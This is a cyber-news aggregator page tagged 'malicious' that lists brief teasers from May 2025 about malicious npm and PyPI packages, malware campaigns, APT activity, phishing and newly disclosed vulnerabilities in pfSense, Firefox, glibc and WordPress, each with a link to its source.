Collecting Cyber-News from over 60 sources

Tag: malicious

Malicious npm Package in Koishi Chatbots Steals Sensitive Data in Real Time

May 20, 2025 11:54 AM

Tags: api, backdoor, cyber, data, malicious, threat

Socket’s Threat Research Team has uncovered a dangerous npm package named koishi-plugin-pinhaofa, masquerading as a spelling-autocorrect helper for Koishi chatbots. Marketed innocently, this plugin embeds a insidious data-exfiltration backdoor that scans every incoming message for an eight-character hexadecimal string a common format for Git commit hashes, truncated JWT tokens, API keys, or device IDs. Upon…
Go-Based Malware Deploys XMRig Miner on Linux Hosts via Redis Configuration Abuse

May 20, 2025 10:54 AM

Tags: cybersecurity, jobs, linux, malicious, malware, vulnerability

Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that’s targeting publicly accessible Redis servers.The malicious activity has been codenamed RedisRaider by Datadog Security Labs.”RedisRaider aggressively scans randomized portions of the IPv4 space and uses legitimate Redis configuration commands to execute malicious cron jobs on vulnerable systems,” First seen on thehackernews.com Jump to…
Malicious PyPI Packages Exploit Instagram and TikTok APIs to Validate User Accounts

May 20, 2025 9:54 AM

Tags: api, breach, cybersecurity, email, exploit, malicious, pypi, tool

Cybersecurity researchers have uncovered malicious packages uploaded to the Python Package Index (PyPI) repository that act as checker tools to validate stolen email addresses against TikTok and Instagram APIs.All three packages are no longer available on PyPI. The names of the Python packages are below -checker-SaGaF (2,605 downloads)steinlurks (1,049 downloads)sinnercore (3,300 downloads) First seen on…
Critical pfSense Firewall Flaws Enable Attackers to Inject Malicious Code

May 20, 2025 8:54 AM

Tags: access, cyber, firewall, flaw, malicious, software, unauthorized, vulnerability

Security researchers have uncovered three critical vulnerabilities in pfSense firewall software that could allow attackers to inject malicious code, corrupt configurations, and potentially gain unauthorized access to systems. These vulnerabilities were responsibly disclosed to Netgate, the company behind pfSense, between November and December 2024, but remained unpatched in stable releases beyond the standard 90-day disclosure…
Malicious payloads embedded in Procolored printers

May 19, 2025 10:54 PM

Tags: malicious

First seen on scworld.com Jump to article: www.scworld.com/brief/malicious-payloads-embedded-in-procolored-printers
Malicious PyPI package sets sights on Russian developers

May 19, 2025 10:54 PM

Tags: malicious, pypi, russia

First seen on scworld.com Jump to article: www.scworld.com/brief/malicious-pypi-package-sets-sights-on-russian-developers
Chinese APT Hackers Target Organizations Using Korplug Loaders and Malicious USB Drives

May 19, 2025 10:54 PM

Tags: apt, china, cyber, espionage, group, hacker, malicious, threat

Advanced persistent threat (APT) groups with ties to China have become persistent players in the cyber espionage landscape, with a special emphasis on European governmental and industrial entities, according to a thorough disclosure from ESET’s APT Activity Report for Q4 2024 to Q1 2025. The report, covering activities from October 2024 to March 2025, highlights…
Hackers Exploit AutoIT Scripts to Deploy Malware Targeting Windows Systems

May 19, 2025 8:54 PM

Tags: attack, cyber, cybersecurity, exploit, hacker, malicious, malware, tool, windows

Cybersecurity researchers have unearthed a sophisticated attack leveraging AutoIT, a long-standing scripting language known for its deep integration with Windows operating systems. Often compared to .NET for its persistence in malicious campaigns, AutoIT’s simplicity and ability to interact with Windows components make it a favored tool among cybercriminals. This weekend, a particularly intricate malware delivery…
New Malware on PyPI Poses Threat to Open-Source Developers

May 19, 2025 6:54 PM

Tags: backdoor, malicious, malware, open-source, pypi, threat

Malicious dbgpkg package on PyPI poses as a debugging utility but acts as a delivery mechanism for a stealthy backdoor First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/malware-pypi-threat-open-source/
Skitnet Malware Employs Stealth Techniques to Execute Payload and Maintain Persistence Techniques

May 19, 2025 5:54 PM

Tags: access, cyber, group, malicious, malware, threat

A new and highly sophisticated multi-stage malware, known as Skitnet (or Bossnet), has been uncovered, showcasing advanced stealth techniques to execute its malicious payload and maintain persistent access on infected systems. Developed by the threat group LARVA-306, Skitnet has been actively sold on underground forums like RAMP since April 19, 2024, with its creators offering…
A spoof antivirus makes Windows Defender disable security scans

May 19, 2025 2:54 PM

Tags: antivirus, api, detection, malicious, microsoft, tool, windows

Persistent API-level spoofing: While WSC is typically guarded by mechanisms like Protected Process Light (PPL) and signature validation, Defendnot sidesteps these barriers by injecting its code into Taskmgr.exea system-signed, trusted process. From there, it registers the ghost antivirus entry under a spoofed name.Additionally, to ensure it sticks around, defendnot sets up persistence via Windows Task…
Malicious RVTools installer found on official site, researcher warns

May 19, 2025 2:54 PM

Tags: malicious

The official site for RVTools has apparently been hacked to serve a compromised installer for the popular utility, a security researcher has warned. It’s difficult to … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/05/19/rvtools-installer-malware/
New ModiLoader Malware Campaign Targets Windows PCs, Harvesting User Credentials

May 19, 2025 11:54 AM

Tags: credentials, cyber, email, finance, intelligence, malicious, malware, phishing, windows

AhnLab Security Intelligence Center (ASEC) has recently uncovered a malicious campaign distributing ModiLoader (also known as DBatLoader) malware through phishing emails. These emails, crafted in Turkish and impersonating a Turkish bank, urge recipients to open a malicious attachment under the guise of checking their transaction history. Inside the compressed RAR file lies a BAT script…
Critical Firefox 0-Day Flaws Allow Remote Code Execution

May 19, 2025 11:54 AM

Tags: browser, cve, cyber, flaw, malicious, remote-code-execution, vulnerability, zero-day

Mozilla has urgently patched two critical 0-day vulnerabilities in its popular web browser Firefox, both of which could allow remote attackers to execute malicious code on user systems. The flaws, tracked as CVE-2025-4918 and CVE-2025-4919, were disclosed on May 17, 2025, and are addressed in Firefox version 138.0.4. Security experts are strongly advising all users…
8 security risks overlooked in the rush to implement AI

May 19, 2025 10:54 AM

Tags: access, ai, api, application-security, attack, authentication, business, ciso, compliance, control, cyber, data, data-breach, exploit, flaw, framework, governance, hacker, injection, leak, LLM, malicious, monitoring, network, privacy, RedTeam, regulation, risk, risk-assessment, risk-management, software, strategy, threat, tool, training, unauthorized, vulnerability

Data exposure AI systems often process large volumes of sensitive information, and without robust testing, organizations may overlook how easily this data can be leaked, either through unsecured storage, overly generous API responses, or poor access controls.”Many AI systems ingest user data during inference or store context for session persistence,” says Dr. Peter Garraghan, chief…
Thousands of WordPress Sites at Risk Due to Critical Crawlomatic Plugin Vulnerability

May 19, 2025 9:54 AM

Tags: cve, flaw, malicious, remote-code-execution, risk, vulnerability, wordpress

A severe security vulnerability has been discovered in the popular WordPress plugin, Crawlomatic Multisite Scraper Post Generator, potentially placing thousands of websites at risk. Tracked as CVE-2025-4389, the flaw allows unauthenticated attackers to upload malicious files, which could ultimately lead to remote code execution on affected websites. First seen on thecyberexpress.com Jump to article: thecyberexpress.com/crawlomatic-plugin-hit-by-cve-2025-4389/
GNU C(glibc) Vulnerability Let Attackers Execute Arbitrary Code on Millions of Linux Systems

May 19, 2025 8:56 AM

Tags: cve, cyber, exploit, flaw, linux, malicious, vulnerability

Security researchers have disclosed a significant vulnerability in the GNU C Library (glibc), potentially affecting millions of Linux systems worldwide. The flaw, identified as CVE-2025-4802, involves statically linked setuid binaries that incorrectly search library paths, potentially allowing attackers to execute malicious code with elevated privileges. While no exploitations have been reported in the wild, the…
Former U.S. Govt Employees Targeted by Chinese Intelligence

May 16, 2025 10:54 PM

Tags: china, government, intelligence, jobs, malicious, network

Report Uncovered Malicious Fake Job Network Operated by a Chinese Company. Recently laid off U.S. federal government officials are being targeted by Chinese intelligence through a network of front companies purporting to offer consulting work. Reports that foreign adversaries intended to recruit former officials began as soon as the administration intentions became apparent. First seen…
New Ransomware Attack Targets Elon Musk Supporters Using PowerShell to Deploy Payloads

May 16, 2025 9:54 PM

Tags: attack, cyber, cybersecurity, infection, malicious, phishing, powershell, ransomware

A newly identified ransomware campaign has emerged, seemingly targeting supporters of Elon Musk through a highly sophisticated phishing-based attack. Cybersecurity researchers have uncovered a multi-stage infection chain that begins with a deceptive PDF document titled “Pay Adjustment.” This document lures victims into downloading a malicious ZIP file hosted on Netlify, a popular web hosting platform.…
Printer Company Distributes Malicious Drivers Infected with XRed Malware

May 16, 2025 9:54 PM

Tags: antivirus, backdoor, cyber, malicious, malware, software

Procolored, a printer manufacturing company, has been found distributing software drivers infected with malicious code, including the notorious XRed backdoor malware. The issue came to light when Cameron Coward, a YouTuber behind the channel Serial Hobbyism, attempted to review a $6,000 UV printer and encountered antivirus alerts upon plugging in a USB drive containing the…
FBI Alerts Public to Malicious Campaign Impersonating US Government Officials

May 16, 2025 9:54 PM

Tags: access, ai, cyber, government, malicious, threat

Federal Bureau of Investigation has issued a warning about an ongoing malicious messaging campaign targeting current and former senior US government officials and their contacts. Since April 2025, threat actors have been impersonating high-ranking US officials through text messages and AI-generated voice calls in an effort to gain access to personal accounts and potentially sensitive…
Frigidstealer Malware Targets macOS Users to Harvest Login Credentials

May 16, 2025 9:54 PM

Tags: credentials, cyber, login, macOS, malicious, malware, threat, update

An macOS users, a new information-stealing malware dubbed FrigidStealer has emerged as a formidable threat since January 2025. This insidious malware capitalizes on user trust by masquerading as routine browser updates, luring unsuspecting individuals into downloading a malicious disk image file (DMG) from compromised websites. Unlike conventional malware, FrigidStealer bypasses macOS Gatekeeper protections by coercing…
APT Group 123 Targets Windows Systems in Ongoing Malicious Payload Campaign

May 16, 2025 9:54 PM

Tags: apt, cyber, group, korea, malicious, middle-east, north-korea, threat, windows

Group123, a North Korean state-sponsored Advanced Persistent Threat (APT) group also known by aliases such as APT37, Reaper, and ScarCruft, continues to target Windows-based systems across multiple regions. Active since at least 2012, the group has historically focused on South Korea but has broadened its operations since 2017 to include Japan, Vietnam, the Middle East,…
Russian Espionage Operation Targets Organizations Linked to Ukraine War

May 16, 2025 9:54 PM

Tags: email, espionage, malicious, russia, ukraine, vulnerability, xss

In Operation RoundPress, the compromise vector is a spearphishing email leveraging an XSS vulnerability to inject malicious JavaScript code into the victim’s webmail page First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/fancy-bear-russia-cyber-espionage/
Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks

May 16, 2025 11:54 AM

Tags: access, attack, cybersecurity, malicious, malware, office, powershell, rat

Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT.”Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents,” Qualys security researcher Akshay Thorve said in a technical report. “The attack chain leverages…
Hackers Leveraging PowerShell to Bypass Antivirus and EDR Defenses

May 16, 2025 10:54 AM

Tags: antivirus, cyber, cybersecurity, defense, detection, edr, endpoint, exploit, hacker, malicious, microsoft, powershell, threat, windows

Cybersecurity researchers have uncovered a growing trend in which threat actors are exploiting Microsoft PowerShell a legitimate Windows command-line interface to bypass advanced antivirus and Endpoint Detection and Response (EDR) defenses. This technique, often termed as “Living off the Land” (LotL), allows attackers to leverage built-in system utilities, reducing their reliance on external malicious payloads…
Polymorphic phishing attacks flood inboxes

May 16, 2025 7:54 AM

Tags: ai, attack, email, malicious, phishing, threat

AI is transforming the phishing threat landscape at a pace many security teams are struggling to match, according to Cofense. In 2024, researchers tracked one malicious email … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/05/16/polymorphic-phishing-attacks-cofense/
Backdoor implant discovered on PyPI posing as debugging utility

May 16, 2025 12:54 AM

Tags: attack, backdoor, country, crypto, finance, malicious, open-source, pypi, russia, software, supply-chain, threat, ukraine
Hackers Exploit Google Services to Send Malicious Law Enforcement Requests

May 15, 2025 6:54 PM

Tags: cyber, cybersecurity, exploit, google, hacker, infrastructure, law, malicious, phishing, service

Cybersecurity researchers have uncovered a sophisticated phishing campaign where malicious actors exploit Google services to dispatch fraudulent law enforcement requests. This audacious scheme leverages the trust associated with Google’s infrastructure, specifically Google Forms and Google Drive, to craft and distribute highly convincing requests that appear to originate from legitimate law enforcement entities. The primary objective…
Threat Actors Exploit Open Source Packages to Deploy Malware in Supply Chain Attacks

May 15, 2025 6:54 PM

Tags: attack, crypto, cyber, exploit, malicious, malware, open-source, pypi, software, supply-chain, threat

The Socket Threat Research Team has uncovered a surge in supply chain attacks where threat actors weaponize open source software libraries to deliver malicious payloads such as infostealers, remote shells, and cryptocurrency drainers. With modern development heavily reliant on ecosystems like npm, PyPI, Go Module, Maven Central, and RubyGems where 7090% of codebases consist of…